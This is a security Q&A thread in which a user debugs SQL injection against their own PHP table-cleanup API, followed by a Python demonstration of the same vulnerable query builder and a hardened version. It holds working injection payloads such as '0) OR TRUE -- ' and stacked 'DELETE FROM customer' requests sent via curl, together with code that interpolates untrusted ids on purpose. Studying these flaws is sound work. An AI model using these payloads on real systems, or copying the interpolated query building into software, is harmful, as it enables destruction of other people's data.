
I have an internal API tool to clear database tables for testing. The code is unsafe and I want to write a small PoC; however, I am having trouble successfully executing this basic SQL injection.

This function generates the query which will be executed:

    private function createQuery(Table $table): string
    {
        if ('' === $table->conditional()) {
            return sprintf('DELETE FROM `%s`;', $table->name());
        }

        return sprintf('DELETE FROM `%s` WHERE %s;', $table->name(), $table->conditional());
    }

It is possible to pass specific IDs to the API so that only specific rows are deleted rather than the whole table. The conditional string is built like this:

    public static function createConditional(string $primaryKey, array $ids, bool $hexPrimaryKey = true): string
    {
        if ([] === $ids) {
            return '';
        }

        // IDs are interpolated directly: as 0x... hex literals, or as double-quoted strings
        return $primaryKey . ' in (' . implode(
            '", "',
            $hexPrimaryKey
                ? array_map(static fn ($id) => '0x' . $id, $ids)
                : array_map(static fn ($id) => '"' . $id . '"', $ids)
        ) . ')';
    }

Finally, the query is executed:

    $query = $this->createQuery($table);
    //dd($query);
    $affectedRows = (int) $this->connection->executeStatement($query);

A normal request generates the following query:

    curl -X POST http://127.0.0.1:8000/api/table-cleanup \
      -H "Content-Type: application/json" \
      -H "Authorization: Bearer $TOKEN" \
      -d '{"types": {"products": ["11dc680240b04f469ccba354cbf0b967"]}}'

    => DELETE FROM `product` WHERE id in (0x11dc680240b04f469ccba354cbf0b967);

I am trying to craft a query to delete another table:

    curl -X POST http://127.0.0.1:8000/api/table-cleanup \
      -H "Content-Type: application/json" \
      -H "Authorization: Bearer $TOKEN" \
      -d '{"types": {"products": ["11dc680240b04f469ccba354cbf0b967; DELETE FROM customer;--"]}}'

    => DELETE FROM `product` WHERE id in (0x11dc680240b04f469ccba354cbf0b967; DELETE FROM customer;--)

Pasting the generated query into my mysql CLI gives this output, but it does delete the table:

    mysql> DELETE FROM `product` WHERE id in (0x11dc680240b04f469ccba354cbf0b967; DELETE FROM customer;--)
    ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
    Query OK, 1 row affected (0.00 sec)

        -> ;
    ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '--)' at line 1

In PHP, however, it just gives an error and doesn't delete anything.

Another attempt:

    curl -X POST http://127.0.0.1:8000/api/table-cleanup \
      -H "Content-Type: application/json" \
      -H "Authorization: Bearer $TOKEN" \
      -d '{"types": {"carts": ["0; \";DELETE FROM customer;; -- "]}}' | lynx -stdin

    => DELETE FROM `cart` WHERE token in ("0; ";DELETE FROM customer;; -- ");

Again, this works in the mysql CLI, but in PHP it gives this error:

    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0027;DELETE FROM customer;; -- \u0022)\u0027 at line 1"
  • This is a pure programming question. It is off-topic on Security SE. I suggest moving it to SO.
    – mentallurg
    Commented Jul 30, 2024 at 21:15
  • @mentallurg It would be a programming question if I were asking how to write a SQL query or how to fix the SQLi vulnerability. But I am asking for a way to forge the request to exploit a vulnerability; that is not purely programming.
    – O'Niel
    Commented Jul 31, 2024 at 0:52
  • @oniel: You are asking why your SQL is not syntactically correct. Also, the response shows how to create "syntactically valid SQL". That's why it is a pure programming question and is off-topic on Security SE.
    – mentallurg
    Commented Aug 1, 2024 at 4:41

1 Answer

None of what you've shown is syntactically valid SQL. For example, an opening parenthesis needs to be closed at some point. The same is true for double quotes. This isn't specific to SQL injection attacks; it's basic syntax.

Besides that, you cannot simply append another query to the current one. Executing multiple queries is a special feature of some database systems (like MySQL) which, depending on the database interface, requires the application to call a separate function or enable a particular setting.

In general, injection attacks only allow you to manipulate the current query, e.g., by changing the condition of the WHERE clause.

For example, in this case you could delete all rows by injecting 0) OR TRUE -- . This results in the following query:

    DELETE FROM `product` WHERE id in (0x0) OR TRUE -- )

The 0x0 is just a dummy value to fill the list of the IN condition. By using OR TRUE, the WHERE condition is always fulfilled, regardless of the part before. And a comment is used to get rid of the trailing parenthesis which comes from the original IN list.

  • And is it possible to manipulate the query with the current code, to e.g. insert something like (SELECT id from product) into the WHERE IN to delete all rows?
    – O'Niel
    Commented Jul 30, 2024 at 14:49
  • @O'Niel: You cannot reference the same table in the FROM clause of a DELETE query and a subquery within the WHERE clause, but to delete all rows, you could construct the query DELETE FROM product WHERE id IN (0) OR TRUE -- ), where the 0 is a dummy value, and the OR TRUE automatically fulfills the condition.
    – Ja1024
    Commented Jul 30, 2024 at 16:12
  • I tried your command curl -X POST http://127.0.0.1:8000/api/table-cleanup -H "Content-Type: application/json" -H "Authorization: Bearer $TOKEN" -d '{"types": {"product": ["0) OR TRUE --"]}}' | lynx -stdin and got this output: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0027)\u0027 at line 1
    – O'Niel
    Commented Jul 30, 2024 at 19:38
  • @O'Niel: There's a missing space after the -- comment. There also seem to be single quotes in the query (unicode U+0027), so the queries you've posted above apparently don't reflect what's actually executed. In any case, if you want to do SQL injection attacks, you have to be willing to spend some time on debugging and research. It's normal that it takes a few tries to get the attack working.
    – Ja1024
    Commented Jul 30, 2024 at 19:53
  • Amazing. With the space it indeed works. Thanks mate.
    – O'Niel
    Commented Jul 31, 2024 at 0:48
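An added example, not code from the question or the answer: a Python port of the two PHP functions above, run against an in-memory SQLite database that stands in for MySQL (both accept 0x hex literals, backtick-quoted identifiers and "-- " comments). It reproduces why the stacked-statement payload from the question fails on a single-statement execute() while the answer's `0) OR TRUE -- ` payload deletes every row, and adds a hardened variant (my assumption of a fix, not the project's) that rejects that payload before any SQL runs. The sample tables and small integer ids are constructed so the 0x literals fit SQLite's 64-bit integers; SQLite does not reproduce MySQL's requirement of whitespace after `--`, so the missing-space failure from the comments is not shown.

```python
import re
import sqlite3

# Port of the page's PHP createConditional()/createQuery(). The table name is
# assumed trusted here; only the ids come from the request body.


def create_conditional(primary_key, ids, hex_primary_key=True):
    if not ids:
        return ""
    if hex_primary_key:
        values = ["0x" + i for i in ids]        # 0x11dc... style literal
    else:
        values = ['"' + i + '"' for i in ids]   # "token" style literal
    # Joiner kept as in the PHP: with two or more hex ids it yields 0x1", "0x2,
    # which is itself a syntax error, so the examples below use one id at a time.
    return primary_key + " in (" + '", "'.join(values) + ")"


def create_query(table, conditional):
    if conditional == "":
        return f"DELETE FROM `{table}`;"
    return f"DELETE FROM `{table}` WHERE {conditional};"


def fresh_db():
    # Constructed sample data standing in for the app's product/customer tables.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product  (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE customer (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO product  VALUES (1, 'a'), (2, 'b'), (3, 'c');
        INSERT INTO customer VALUES (1, 'x'), (2, 'y');
    """)
    return conn


def count(conn, table):
    return conn.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]


def run_delete(conn, table, ids):
    """Build the query exactly as the vulnerable code does and run it through a
    single-statement execute(), like executeStatement(). Returns (query, outcome),
    where outcome is the affected-row count or the error text."""
    query = create_query(table, create_conditional("id", ids))
    try:
        cur = conn.execute(query)
        conn.commit()
        return query, cur.rowcount
    except sqlite3.Error as e:
        conn.rollback()
        return query, f"error: {e}"


HEX = re.compile(r"[0-9a-fA-F]{1,32}")


def safe_delete(conn, table, ids):
    """Hardened variant (an assumed fix, not the page's code): allow-list the table
    and accept only hex digits per id, so the interpolated 0x literal cannot break
    out of the IN list. Values compared as text should be bound as parameters."""
    if table not in ("product", "customer"):
        raise ValueError(f"table not allowed: {table}")
    for i in ids:
        if not HEX.fullmatch(i):
            raise ValueError(f"rejected id: {i!r}")
    cur = conn.execute(create_query(table, create_conditional("id", ids)))
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    conn = fresh_db()
    # 1. The question's stacked-statement payload: syntax error, nothing deleted.
    print(run_delete(conn, "product", ["1; DELETE FROM customer;--"]))
    # 2. The answer's payload: rewrites the WHERE clause, every product row goes.
    print(run_delete(conn, "product", ["0) OR TRUE -- "]))
    print("products:", count(conn, "product"), "customers:", count(conn, "customer"))
    # 3. Same payload against the hardened builder is rejected before any SQL runs.
    try:
        safe_delete(fresh_db(), "product", ["0) OR TRUE -- "])
    except ValueError as e:
        print(e)
```

The stacked payload fails for the same structural reason as in PHP: the driver prepares one statement, and a `;` inside the unclosed IN list is a syntax error before any second statement is reached. The `0) OR TRUE -- ` payload never leaves the current statement, which is why it works through the same single-statement API. Note that the character allow-list only protects the hex path; the "token" path that wraps ids in double quotes would need parameter binding rather than interpolation.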
